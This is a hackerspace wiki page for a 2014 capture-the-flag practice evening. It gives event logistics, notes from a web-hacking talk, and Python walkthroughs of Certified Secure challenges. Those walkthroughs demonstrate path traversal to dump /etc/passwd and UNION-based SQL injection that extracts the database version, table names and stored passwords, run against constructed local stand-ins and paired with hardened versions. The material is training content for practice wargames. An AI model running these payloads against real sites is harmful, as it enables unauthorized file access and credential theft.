Latest revision as of 22:35, 13 January 2014
| CTF-practice-evening:2014-01-13 | |
|---|---|
| Date | 2014/01/13 |
| Time | |
| Location | Tech Inc |
| Type | Workshop |
| Contact | Melanie |
Capture The Flag evening - Part 4
- 13 January, 2014 - 8 PM
- Please bring along a laptop with you!!!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
Our 1st CTF
- Positive Hack Days (PhD) qualifier
  - 48 hours: Jan. 25, 2014, 8 a.m. to Jan. 27, 2014, 8 a.m.
  - http://quals.phdays.ru/
- Let's meet at Tech Inc on Saturday
  - Jan 25 - 10 AM
  - TODO: Add to Tech Inc event list
  - Sunday is the Tech Inc ALV (general members' meeting), so things won't be as organised that day.
- We are now registered for the Positive Hack Days, as team Knuffelhackers
- See: http://knuffelhackers.nl
- Stuff to prepare
  - Stepping stone box (a shared jump host for storing tools and giving lots of people access)
  - Edit pad - etherpad or https://quadpad.lqdn.fr
    - We will want to archive this afterwards, for write-ups and such
  - IRC channel - create a password-protected #techinc-ctf channel
- We have a mailing list already - http://technologia-incognita.nl/cgi-bin/mailman/listinfo/ctf
Web hacking!!!!
- Julius is talking about OWASP and web hacking this evening
  - Topics: brute force, SQL injection, network eavesdropping, XSS, session hijacking
- Afterwards, Stef did some web hacking demonstrations using the Certified Secure challenges
  - Challenge: Herman Vluchtbeveiliging
    - Append a single quote to the URL parameter and see whether the page breaks
    - Can we request an arbitrary file through the page parameter? Example: pagina=/etc/passwd
    - That doesn't work as-is, but the resulting error tells us where on the filesystem the application looks for its pages
    - Knowing that directory, some directory traversal (a chain of ../ back up to the root) lets us dump the password file
  - Challenge: Security Shop
    - The Search Product field is injectable
    - Once again we want to provoke an error that leaks information from the backend; a single quote does it
    - The error message indeed contains the SQL query, including part of the database schema (the table and column names it selects)
    - UNION appends the rows of a second SELECT to the result of the first, but only if both return the same number of columns
    - So we try UNION SELECT 1 --
    - The error message tells us the UNION's column count doesn't match the original SELECT
    - We keep adding columns (UNION SELECT 1,2,3,4 -- and so on) until the error disappears; the count that works is the number of columns in the original query
    - Another expression that often works is VERSION()
    - Replacing one placeholder (say 3) with VERSION() prints the MySQL version string on the page; on Ubuntu that string carries the distribution's package suffix, which is how we can tell the Ubuntu version
    - USER() also leaks information: the database account the application connects as
    - Trial and error works pretty well from here: we need to select from other tables, and we can guess what they might be called (on MySQL, information_schema.tables lists them)
    - The password can be read the same way
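The Herman Vluchtbeveiliging steps above, worked through in Python as an added example (not code from these notes or from Certified Secure). The pages directory, the fake /etc/passwd and the whole tree are constructed inside a temporary directory so the demo runs offline; against a real server the root is simply "/". The PHP-style include("pages/" . $pagina) behaviour, and the warning text that leaks the full path, are assumptions about how such a challenge builds its include path.

```python
"""Local file include / path traversal through a 'pagina' parameter:
an absolute path fails, the leaked warning reveals the include directory,
and a '../' chain built from that directory reaches /etc/passwd.
The filesystem is a constructed temp tree (<root>/var/www/pages and
<root>/etc/passwd); against a real server <root> is '/'.
"""
import os
import re
import tempfile


def build_fake_fs():
    """Constructed stand-in for the target's filesystem."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    pages = os.path.join(root, "var", "www", "pages")
    os.makedirs(pages)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(pages, "home.html"), "w") as f:
        f.write("<h1>Herman Vluchtbeveiliging</h1>\n")
    with open(os.path.join(root, "etc", "passwd"), "w") as f:  # constructed content
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
    return root, pages


def vulnerable_include(pages_dir, pagina):
    """Assumed challenge behaviour: include("pages/" . $_GET["pagina"]).
    Plain string concatenation, no validation, and the raw warning
    (full path included) is sent back to the browser."""
    path = pages_dir + "/" + pagina
    try:
        with open(path) as f:
            return f.read()
    except OSError as exc:
        return f"Warning: include({path}): failed to open stream: {exc.strerror}"


def leaked_include_dir(warning, pagina):
    """Recover the include directory from the leaked warning text."""
    m = re.search(r"include\((.*?)/" + re.escape(pagina) + r"\)", warning)
    return m.group(1) if m else None


def traversal_payload(include_dir, fs_root, target="etc/passwd"):
    """One '../' per path component between the include dir and the root.
    For a real target pass fs_root='/' (i.e. count the leaked path's parts)."""
    depth = len(os.path.relpath(include_dir, fs_root).split(os.sep))
    return "../" * depth + target


def safe_include(pages_dir, pagina):
    """Hardened variant: resolve the final path and refuse anything that
    does not stay inside pages_dir (absolute paths and '../' chains alike)."""
    base = os.path.realpath(pages_dir)
    path = os.path.realpath(os.path.join(base, pagina))
    if os.path.commonpath([base, path]) != base:
        return None
    with open(path) as f:
        return f.read()


def run_demo():
    root, pages = build_fake_fs()
    warning = vulnerable_include(pages, "/etc/passwd")   # fails, but leaks the directory
    include_dir = leaked_include_dir(warning, "/etc/passwd")
    payload = traversal_payload(include_dir, root)       # e.g. ../../../etc/passwd
    return {
        "warning": warning,
        "include_dir": include_dir,
        "payload": payload,
        "dumped": vulnerable_include(pages, payload),    # the password file
        "blocked": safe_include(pages, payload),         # None: hardened version refuses
        "allowed": safe_include(pages, "home.html"),     # legitimate page still works
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The hardened version checks the resolved path, not the string: stripping "../" from the input is not enough, since encodings and absolute paths get around it, while `realpath` plus a prefix check rejects both.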
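The Security Shop walkthrough above as an added Python example; it is not code from these notes or from the challenge. An in-memory sqlite3 database stands in for the MySQL backend: sqlite_version() takes the place of VERSION(), SQLite has no USER() equivalent, and sqlite_master takes the place of MySQL's information_schema.tables, which the example uses to list tables instead of guessing names (one step beyond what the notes describe). The shop schema, the products and the admin credential are all constructed for the demo.

```python
"""UNION-based SQL injection through a product-search field: a single quote
breaks the query and leaks it, UNION SELECT 1,2,... finds the column count,
then version, table names and credentials are read through the placeholders.
sqlite3 in memory stands in for MySQL; all data below is constructed."""
import sqlite3

# The application's query, with the search term pasted straight in (the bug).
QUERY = ("SELECT id, name, description, price, stock FROM products "
         "WHERE name LIKE '%{term}%'")


def setup_shop():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT,
                               price REAL, stock INTEGER);
        INSERT INTO products VALUES (1, 'Firewall', 'Stateful packet filter', 99.0, 5),
                                    (2, 'Lockpick set', 'Hobby grade', 25.0, 12);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret-hunter2');  -- constructed credential
    """)
    return db


def search_vulnerable(db, term):
    """Vulnerable search: raw database error (query included) goes to the browser."""
    sql = QUERY.format(term=term)
    try:
        return {"rows": db.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": None, "error": f"{exc} in query: {sql}"}


def find_column_count(db, max_cols=12):
    """Grow 'UNION SELECT 1,2,...' until the column-mismatch error disappears."""
    for n in range(1, max_cols + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        if search_vulnerable(db, f"' UNION SELECT {placeholders} -- ")["error"] is None:
            return n
    return None


def slots(ncols, **at):
    """'1,2,3,4,5' with chosen positions replaced: slots(5, c3="sqlite_version()")."""
    return ",".join(at.get(f"c{i}", str(i)) for i in range(1, ncols + 1))


def union_rows(db, ncols, select_list, from_clause=""):
    """Run one UNION payload and return only the attacker-controlled rows:
    'nosuchproduct' makes the original LIKE match nothing, so every row that
    comes back belongs to the injected SELECT."""
    payload = f"nosuchproduct' UNION SELECT {select_list}{from_clause} -- "
    return search_vulnerable(db, payload)["rows"]


def run_attack(db):
    probe = search_vulnerable(db, "'")                       # step 1: break the query
    ncols = find_column_count(db)                            # step 2: match the column count
    version = union_rows(db, ncols, slots(ncols, c3="sqlite_version()"))[0][2]
    tables = [r[0] for r in union_rows(db, ncols, slots(ncols, c1="name"),
                                       " FROM sqlite_master WHERE type='table'")]
    creds = [(r[0], r[1]) for r in union_rows(db, ncols,
                                               slots(ncols, c1="username", c2="password"),
                                               " FROM users")]
    return {"leaked_query": probe["error"], "columns": ncols,
            "version": version, "tables": tables, "credentials": creds}


def search_safe(db, term):
    """Hardened search: a bound parameter can only ever be data, never SQL."""
    return db.execute("SELECT id, name, description, price, stock FROM products "
                      "WHERE name LIKE ?", ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    shop = setup_shop()
    for key, value in run_attack(shop).items():
        print(f"{key}: {value!r}")
    print("hardened:", search_safe(shop, "x' UNION SELECT 1,2,3,4,5 -- "))
```

Two things the walkthrough glosses over are visible here: the `-- ` comment swallows the trailing `%'` the application appends, and the placeholder numbers only matter for the count, so any of them can be swapped for an expression or a column from another table once the count is right.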
Informational Links
- https://www.owasp.org/index.php/Category:Attack
  - https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  - http://w3schools.com
  - http://yehg.net/lab/#toolbox
- https://hackvertor.co.uk/public
Web-Hacking Wargames
- https://www.certifiedsecure.com - Start with this one!
- OWASP WebGoat (requires setting up a VM)
  - https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project - stand-alone web hacking training application
  - http://tostercrums.blogspot.nl/2011/11/running-webgoat-owasp-in-ubuntu-vm.html - installation advice
  - http://webappsecmovies.sourceforge.net/webgoat/ - solutions
- http://www.hackthissite.org